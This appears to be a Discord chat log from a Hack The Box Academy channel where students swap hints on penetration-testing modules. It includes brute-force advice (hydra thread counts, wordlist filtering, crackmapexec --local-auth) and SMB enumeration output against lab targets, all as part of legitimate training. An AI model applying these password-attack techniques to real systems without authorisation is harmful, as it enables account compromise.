thank u i found it

transfer it as .zip archive

But you could try to read the source code of upload.php

in attacking common services the dns section

do i need to add the ip to resolvers.txt?

Nah @winged hedge

that was the problem, thanks

Yes, htb is not an approved TLD. You need a name server which can resolve this domain.

woot!! finally

huh?

Looks like they are selling edu emails or something

Now do it again

again ? 😮

honestly going back over modules, especially if you struggled. Is helpful

Or even looking if alternative ways exist

The point is not to complete a module as quickly as possible, but to take away as much knowledge as possible

^ can you reliably re-exploit something

yes

It's a big reason why I lurk here. It reinforces knowledge

i was always wonder why people spend their time to help people instead of keep finishing the role path

I feel the same way. I always learn something new by answering the questions.

it makes sense now

learned alot found new techniques that i didnt new, well gonna retake module after few days

Did you know about the IMAP n fetch id body[] command

As opposed to the example given?

No, honestly, until now I never understood why you should query an IMAP server with the Console.
If I have access, then I can also use a mail client.
That's why I never really cared about it until now.

But the question keeps coming up. Someday, when I find the time, I'll try it with the Conosle. Just for fun

IMAP and DNS

I linked a useful IMAP commands article

DNS is easy, but IMAP …

Yes, I have seen it. Thanks

Once you know how it works it's easy with console...

Then again that's how most console things work

MSSQL GUI? Gross, MSSQL CLI ? Clean

I believe that immediately. That's the case with everything. Once you understand it, it's simple and logical.

The modules are great jumping points as well if you want to dive deeper

i added the ip to resolvers.txt

and in etc/host as inlanefreight.com

why?

i did dig in all the subdomains

and any of them work

@lethal shard Any hints on Q2 of the Skill Assessment 2? 🙂

with inlanefreight.htb didnt work the subbrute

They are pointing out: inlanefreight.com not htb

Needed that haha

Inlanefreight.com is an actual (fake) website that HTB owns

So true lmao

I'm at 13 hours on password Attacks and about halfway through haha

true

Yes, I got that already. It's a directory beginning with the letter i. There's nothing in it when I search it.

Password attacks is needlessly slow

it has a different ip

realistic but needless

longest module i have done by far

whos good on programming

Read #rules and #welcome
If it's related to an academy module, post here

If not #1024429874246590575

Hy i am new fresher in this group

See above message

No one.

No one here will help you ddos

Some indian dude on YT may help you though

they always come in clutch

name ??

Idk dude

hahahahaha

I was being abstract. DDOS is directly against any ToS, therefore illegal. If you read #rules

||phpggc||

@fathom pendant come on private

Fuck off

:)

Have you solved the task completely?
The first question is exactly the same in principle.

🎵 Trying to get themselves banned, and we all watch and laugh.🎵

You've already been told no. Continuing this will result in moderators being involved

I got the answer for the second question. It's the directory I mentioned finding already.

Yes, exactly.
The first question actually works exactly the same way.
Just call /flag.txt.

Okay, that was tooooo easy! I thought I had to have the specific directory and that it wasn't going to be just in root. Thank you for your help! I really appreciate it!

People often tend to want to solve things in a way that is far too complicated. Happens to me all the time

Hello everyone! I'm a little stuck in the last question on the PIVOTING, TUNNELING, AND PORT FORWARDING: Skills Assessment. I've found the DC on 172.16.10.5 because it's a Windows machine. But I can't acces by RDP into it. Can I someone give me some tips?

Using ||CI4/RCE6|| into the ||import||? Hrm, I tried that one.

I really appreciate it! I was beginning to lose hair. LOL!

Are you stuck in the 3rd question? Did you do a port scan to check to see if the RDP port is open?

||try other RCE numbers||

I'm stuck in the last question, about DC

Ah! Got it. That ||version column|| is super confusing! Thanks a lot for the hints! Now I can sleeeeeeeeeeeeeeep!

What is this video?

@winged hedge

my recent work that will hack the mind to reality

Eh it's not relevant to this channel

it is relevant to life

congratz! love this module. very challenging and my brain wrinkles worked hard

It's not relevant at all

this channel would not exist if it wasnt for this message

Not really

This channel exists for http://academy.hackthebox.com

I suggest learning how to read, especially #rules and #welcome

Definitely a challenging module, but not as brutal as the AD Enumeration and Abusing HTTP Mechanisms. I just had a habit of overthinking and analyzing this one. I got stuck trying to figure out how to obtain the "user-id" of the dnsmasq, because I thought it meant a process, not a user (- -)

In introduction to windows command line, section finding files and directories

the where command dosent work

i get 0 output

make sure you have an administrative cmd prompt and you are in the root folder of the drive

this is one approach

Hello, I am trying to do the dictionnary attack on SSH service for user "sam" on this https://academy.hackthebox.com/module/147/section/1391 (Password Mutations).
My mutated wordlist is about 1000 words.
Do you have suggestions about performance considerations using CME and hydra to do the password attack on the SSH service ?
I have tried hydra with 60 threads but am getting a lot of connection errors...
The attack seems to be going to take quite a long time. I am wondering if this is the intended way of the module or not ?

Hi, need help with the following:

Module: Shells & Payloads
Section: The Live Engagement
Question: Host 2 - Exploit the blog site and establish a shell session with the target OS. Submit the contents of /customscripts/flag.txt.

After running the exploit inside msfconsole i get the following error: "Exploit failed: NoMethodError undefined method `split' for nil:NilClass". Any idea on what am i possibly doing wrong?

filter for words that start with b/B

why ? where there hints about this ?

somewhere here in the channel, this will reduce the time and words that will be used for bruteforcing

Thanks for the hint, but I am looking for the realistic approach : if I am facing this in the exam, I won't have a hint on the first letter of the password you know...
I don't master enough the tools yet to be sure to use them correctly :

• Do you know if there are good tutorials on how to "tune" hydra to get the best results ? or should I just use -t 64 and let it adapt ?
• Should I also make modification to the default settings like the time to wait for a response (-w) or time between connects per thread (-W) ?
• or perhaps cme may be faster than hydra ? from my testing, changing the number of threads using -t didn't make much differences...
  Is this normal to be that slow or am I doing something wrongly ?

haven't done the exam, therefore my feedback will be not the greatest example

you adjust as per the password policies, weak passwords and etc that you have gather as info

the exercise in the section is a bit of an overkill, since you are generating a humongous password list that will take more time for brute forcing with it compared to the lifetime of the target

I have seen that hydra offer a resume feature, might the challenge be that long to solve specifically for the student to learn how to resume when the target goes down ?

It didnt work

Adding to this, looking at a realistic approach, you would have to review the wordlist if you've generated+mutated with a tool. For the section, once you mutate, there are duplicates which you need to remove. The first 1000ish lines are numbers with special characters and the chances of that being a password is very low, so you'd remove that.
Finally, with this refined wordlist, you just hope that you get the password.

¯_(ツ)_/¯

To me, it only showcases the mutations

Also, they recommend to use -u option in Hydra as it rotates the usernames with each password instead. Which makes chances of hitting the password sooner.

Hey! Im havingb a bit of a problem.
Module: ATTACKING COMMON SERVICES
Question: What is the password for the username "jason"?

Tried brute forcing SMB using crackmapexec and metasploit (smb_logon) via passwords.list (acquired from the resources). No luck.
what to do now?

Then something must be wrong with your command

I get nothing at all

And it gives me the output in 1 second

or less

I tried resetting the box

it didnt help

Check the section, there is something that you are forgetting

Wdym?

basically, read the material again

But no matter what i want to get

where dosent work

like

where cmd

dosent work

Yes, because you are missing something, and please type on one line

--local-auth

Aaaa

you ment that i

But its in the vm so i cant copy past

e

F

on the exercice I am on, there is only user "sam" to attack

there is also an FTP and SMB service running on the target, may I attack them instead of attacking SSH or would this be out of the exercice "rules" ?

play around and find out, thats what are the exercises for

no one will stop you from finding another way of doing a X thing

sure, but I won't be confident if I use an "easy" path and don't know how to do it with an harder path (as said, I am not sure to use properly tools parameters)

Always go for the services that let's you brute-force faster.
When it comes to this particular module, I'd say try not to take realism into too much consideration.
Just keep the important points from the module in mind. Take notes. I haven't attempted the exam myself but I think it'll be enough to serve you well in the exam.

I checked the C:\ Drive

and couldnt find waldo.txt

keep going, reduce the surface, where could waldo be

if you can't find it from the C:\ directory go somewhere else, who can hide waldo

can it be a system, service account on else that can hide him

Aaaa this is a easy module lmao

Like grade "easy"

I had to connect with rdp instead of ssh as specified because when i connected with ssh it didnt give me any output

but now i am getting some output

ohh well.. thanks its worked.
but i dont understand what this flag does. Could you please explaint it to me?

I get an error using ssh

but i am not allowed to post pictures and its on my vm

Adding --local-auth to any of the authentication commands with attempt to logon locally.

sooo.. it tries to authenticate locally instead to the DC?

You should be able to share screenshots

I did, but they got deleted

If they contain spoilers then yeah they'll probably get deleted by a mod

Iirc you only need to verify to be able to share screenshots

They contained nothing, i tried a command and got 0 output

Lol

Then i tried on the shell and got a weird error, but ill look into it tomorrow, i have school and need to go to bed now hehe

Yo I do not like credential hunting

Just get good

@upbeat dragon don't randomly dm me , read the #rules

Hahaha

These modules are making me feel like a pro hacker hehe

Dming is a 2 party consent.

lol ok

From script kiddie to pro hacker 🤪

My game plan is to not start climbing until after I get CPTS

After trying all the words starting with a b (lower and uppercase) as suggested by @autumn pilot again the SMB service, it seems that attacking SMB was not a good solution... no valid password found. Will retry using SSH after all...

my game plan is doing the easy and medium machines that they release weekly

while im doing the modules

im moving to medium now that i know i can solve easy machines solo

Same here, CPTS is priority and I'm hitting OSCP the moment I pass CPTS.

Don't need to do ssh, smb should work. His pass starts with b/B. Did you create the mutated password list using the using the provided wordlists in resources?

Yeah one I pass CPTS I will feel confident in passing OSCP

i will just get the htb exams

the CPTS and the CBBH

what wordlist should i use for the passwords in the Mail Services section in Attacking common services?

i used the wordlist they provide and it isnt the correct one

Hi @livid wing , did u get any answers on this? because I have the same doubt! Thanks

yes :

$ cat mut_password.list | wc -l                    
94044

$ cat mut_password.list | grep -E '^[bB].*' | wc -l
6680

u doing password attacks module?

yes

what question

the question on password mutations

https://academy.hackthebox.com/module/147/section/1391

it is just mutate the password wordlist

with the rule they provide

and bruteforce it with hydra

what services do the target have opened?

I prevously asked about how to fine tune hydra (or cme) to solve this question since it takes ages to attack SSH and the wordlist is is huge. Peoples here told be to just try password starting with letter b

I tried this against smb service and got no success

what ports are open

ftp smb ssh

did u try in the ftp?

nop, I tried SMB

FTP is faster to answer than SMB ?

try it

it depends on the network if im right

I've been having issues lol smbv1 not supported with hydra, cme worked though

But ftp should also work

did you solved it with the whold wordlist of 94k passwords ? (against ftp)

yea

how long did it took (approx)

i dont remember

you had to respawn the target ?

but it takes long i think

I would suggest -t 48

i did it with -t 64

it took like 15-20 min i think

wow, really fast

64 can be touchy

If you want it faster, cut the first 17k lines

will try again using FTP thx

no, I want it to be realistic (at least after being sure to type the correct command line 😄

@fathom pendant what wordlist did u use for the password in Attacking Common Services

Uhhhh

Sec

SMTP

i used the wordlist they provide and i didnt get the password for ||M*||

Did you include the domain?

no

:)

in the section they dont use the domain with hydra

Are you using the full username then ? m*@domain?

yea just did it

ty

:)

Super simple, it tripped me up too

You forgot one step: cry

@fathom pendant one question i always do it with imap or imaps

https://donsutherland.org/crib/imap

the cheatsheet is the same for pop3 and smtp?

Not quite

There should be a list of SMTP commands on the page

But generally to retrieve said emails you'll use a different service. Perhaps the service that hydra tells you

SMTP, IMAP, POP3 fall under the email umbrella

In Documentation and Reporting Skills practice lab, I'm looking for the command injections finding. I know it's not necessary for completion, but it'd be cool to know where it is for science.

For God's Sake.. can someone help me with this.. i've been stuck on this until my eyes are red
ATTACKING COMMON APPLICATIONS ==> Exploiting Web in Thick-Client Applications

Well right in the SQL PART === i have done everything to my best understanding and then complied the program but when i executes it nothing shows up

is it just a roll of the dice if zap hud works? I have not been able to get it to work at all. different browsers , parrot \ pwn \ kali, reinstallation etc... never get it to work.

@summer lava You can PM me with details

hello , Can someone help me with the File Upload Attacks module, Limited File Uploads section Q2 (Try to read the source code of 'upload.php' to identify the uploads directory, and use its name as the answer. (write it exactly as found in the source, without quotes)

I'm in the Skills Assessment for File Upload Attacks and no matter how I craft my payload, I get Only images are allowed. I've tried fuzzing for both the extension and the content-type. I get the same response. Anyone know a way around this?

This one is actually pretty easy. Just use the base64 script that's provided in the section. It will give you the path near the top of the decoded information.

can i dm you ?

Sure.

How do I do this stuff.

I can't believe how awful this mutated password list module is

someone i can ask to upgrade a webshell?

I'd just go ahead and ask and see what you get back

could i ask which one would you recommend after that one? i finished that one

Whatever happens to interest you

hello guys. i got some problem in footprinting module in smb client section.

smbclient -N -L //10.129.37.196

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
sambashare      Disk      InFreight SMB v3.1
IPC$            IPC       IPC Service (InlaneFreight SMB server (Samba, Ubuntu))

Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

I'm still stuck on the File Upload Attacks assessment. Nothing so far has worked. I can't even seem to get the source code. Is anyone available to assist with this assessment?

What is your actual question?